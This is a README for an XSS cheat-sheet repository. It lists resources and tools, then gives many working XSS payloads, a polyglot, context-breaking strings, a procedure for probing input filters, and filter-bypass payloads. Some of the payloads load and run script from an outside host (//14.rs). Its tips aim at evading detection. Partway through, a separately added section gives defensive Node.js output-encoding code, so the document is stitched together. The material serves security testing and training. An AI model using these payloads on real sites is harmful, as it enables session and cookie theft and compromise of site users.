2018-03-11 14:35:30 +00:00
# AwesomeXSS
Awesome XSS stuff.
Put this repo on watch. I will be updating it regularly.
### Awesome Books
- [XSS Cheat Sheet By Brute Logic](http://google.com)
### Awesome Websites
- [brutelogic.com.br](http://brutelogic.com.br)
- [respectxss.blogspot.in](https://respectxss.blogspot.in/)
### Awesome Challenges
- [Google's XSS Challenge](https://xss-game.appspot.com/)
- [prompt(1) to win](http://prompt.ml/)
### Awesome People
- [Rodolfo Assis](https://twitter.com/brutelogic)
- [Ashar Javed](https://twitter.com/soaj1664ashar)
- [Somdev Sangwan](https://twitter.com/s0md3v) because I made this repo :3
### Awesome Reads & Presentations
- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)
- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)
- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)
- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)
- [Copy Pest](https://www.slideshare.net/x00mario/copypest)
### Awesome Tools
- [XSStrike](http://xsstrike.tk/)
- [KNOXSS](http://knoxss.me/)
- [BeEF](https://github.com/beefproject/beef)
- [JShell](https://github.com/UltimateHackers/JShell)
### Awesome Payloads
```
<-- `<img/src=` onerror=alert(1)> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg/x=">"/onload=confirm()//
<svg</onload="1>(_=prompt,_(1))"">
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<details ontoggle=confirm()>
<svg onload=write()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
```
Here's an interesting XSS polyglot by [Ahmed Elsobky](https://github.com/0xsobky/):
```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```
### Awesome Tags & Event Handlers
- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)
Some HTML tags that you will be using:
```
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
```
### Awesome Context Breaking
#### Simple Context
```
<svg onload=alert()>
</tag><svg onload=alert()>
```
#### Attribute Context
```
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
```
#### JavaScript Context
```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
```
### Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
```
confirm()
confirm``
(((confirm)))``
new class extends confirm``{}
```
### Awesome Exploits
A good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all).
### Awesome Probing
If none of this works, take a look at the **Awesome Bypassing** section.
First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about the number and contexts of reflections.
<br>Now for attribute context, check if double quotes (") are being filtered by entering **x"d3v**. If it gets altered to **x&quot;d3v**, chances are that proper security measures are in place. If this happens, try doing the same for single quotes (') by entering **x'd3v**; if it gets altered to **x&apos;**, you are doomed. The only thing you can try is encoding.<br>
If the quotes are not being filtered, you can simply try payloads from the **Awesome Context Breaking** section.
<br>For JavaScript context, check which quotes are being used, for example whether they are doing
```
variable = 'value' or variable = "value"
```
Now let's say single quotes (') are in use; in that case enter **x'd3v**. If it gets altered to **x\\'d3v**, try escaping the backslash (\) by adding a backslash to your probe, i.e. **x\\'d3v**. If it works, use the following payload:
```
\'-alert()-\'
```
But if it gets altered to **x\\'d3v**, the only thing you can try is closing the script tag itself by using
```
</script><svg onload=alert()>
```
For simple HTML context, the probe is **x>d3v**. If it gets altered to **x&gt;d3v**, proper sanitization is in place. If it gets reflected as it is, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is **x<xxx>**. If it gets stripped or altered in any way, it means the filter is looking for a pair of **<** and **>**. It can simply be bypassed using
```
<svg onload=alert()//
```
or this (it will not work in all cases)
```
<svg onload=alert()
```
If your dummy tag lands in the source code as it is, go for any of these payloads
```
<svg onload=alert()>
<embed src=//14.rs>
<details open ontoggle=alert()>
```
### Awesome Bypassing
**Note:** None of these payloads use single (') or double (") quotes.
- Without event handlers
```
<object data=javascript:confirm()>
<script src=//14.rs>
<script>confirm()</script>
```
- Without space
```
<svg/onload=confirm()>
```
- Without slash (/)
```
<svg onload=confirm()>
<img src=x onerror=confirm()>
```
- Without equal sign (=)
```
<script>confirm()</script>
```
- Without closing angle bracket (>)
```
<svg onload=confirm()//
```
- Without alert, confirm, prompt
```
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
```
- Without a Valid HTML tag
```
<x onclick=confirm()>click here
```
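The defender's side of the Probing and Bypassing sections, as an added example that is not code from the AwesomeXSS repository: a context-aware output encoder for the HTML, attribute and JavaScript-string contexts, placed next to the kind of blocklist filter that only strips complete <...> pairs, and both run over constructed copies of the probes from the Probing section (x"d3v, x'd3v, x>d3v, x<xxx>) plus two payloads from this page. It assumes Node.js; every function name is my own.

```javascript
// Added example for the Probing and Bypassing sections; not code from the
// AwesomeXSS repository. Assumes Node.js. The probe strings below are
// constructed copies of the ones the Probing section tells you to send.

// HTML body and quoted-attribute contexts: encode the five characters that
// can change the context. The probe x"d3v must come back as x&quot;d3v and
// x>d3v as x&gt;d3v, which is exactly what the Probing section looks for.
function encodeHtml(s) {
  const table = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => table[c]);
}

// JavaScript string context: hex/unicode-escape every character outside
// [A-Za-z0-9]. Prefixing quotes with a backslash is what the x\'d3v probe
// plays against; with full escaping there is no quote or backslash left to
// abuse, and </script> cannot be formed either because < and / are escaped.
function encodeJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// The blocklist-style filter the probing procedure tries to detect: strip
// anything that looks like a complete <...> pair. The x<xxx> dummy tag is
// removed, but a payload that never closes its tag is left untouched.
function naiveStripTags(s) {
  return s.replace(/<[^>]*>/g, '');
}

// Constructed probes and payloads, taken from the text above.
const PROBES = {
  attrDouble: 'x"d3v',
  attrSingle: "x'd3v",
  html: 'x>d3v',
  dummyTag: 'x<xxx>',
  unclosedSvg: '<svg onload=alert()//',
  jsBreak: "'-alert()-'",
};

// Run one probe through each treatment and report what a reviewer wants to
// know: does the encoded output still contain a context-breaking character,
// does the JS encoding round-trip to the original value, and does the naive
// filter let anything tag-like or handler-like through?
function analyse(probe) {
  const html = encodeHtml(probe);
  const js = encodeJsString(probe);
  const naive = naiveStripTags(probe);
  return {
    html,
    js,
    naive,
    // After removing the entities we emitted, no special character may remain.
    htmlSafe: !/[&<>"']/.test(html.replace(/&(amp|lt|gt|quot|#x27);/g, '')),
    // After removing our \xHH / \uHHHH escapes, only [A-Za-z0-9] may remain.
    jsSafe: !/[^A-Za-z0-9]/.test(js.replace(/\\x[0-9a-f]{2}|\\u[0-9a-f]{4}/g, '')),
    // Evaluate the literal the way a browser would and compare to the input.
    jsRoundTrip: new Function(`return '${js}';`)() === probe,
    // A leftover "<" or "on...=" means the blocklist did not neutralise it.
    survivesNaiveFilter: /<|\bon\w+\s*=/i.test(naive),
  };
}

for (const [name, probe] of Object.entries(PROBES)) {
  console.log(name, analyse(probe));
}
```

Run with node and compare the rows: every probe comes out of the two encoders with htmlSafe and jsSafe true, while the unclosed svg payload from the "Without closing angle bracket" bullet passes through the naive filter unchanged, which is the signal the x<xxx> dummy tag is meant to reveal.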
### Awesome Tips & Tricks
- http(s):// can be shortened to // or /\.
- **document.cookie** can be shortened to **cookie** . It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing **alert('XSS')** and start doing **alert()**.
- You can use **//** to close a tag instead of **>**.
- I have found that **confirm** is the least detected pop-up function so stop using **alert** .
- Quotes around an attribute value aren't necessary as long as it doesn't contain spaces. You can use **<script src=//14.rs>** instead of **<script src="//14.rs">**.
- The shortest independent "XSS" payload is **<embed src=//14.rs>** (19 chars).
### Awesome Credits
All the payloads are crafted by me unless specified.
Thanks to my big brother [Rodolfo Assis](https://twitter.com/brutelogic) whose writings inspired me to become an XSSLord.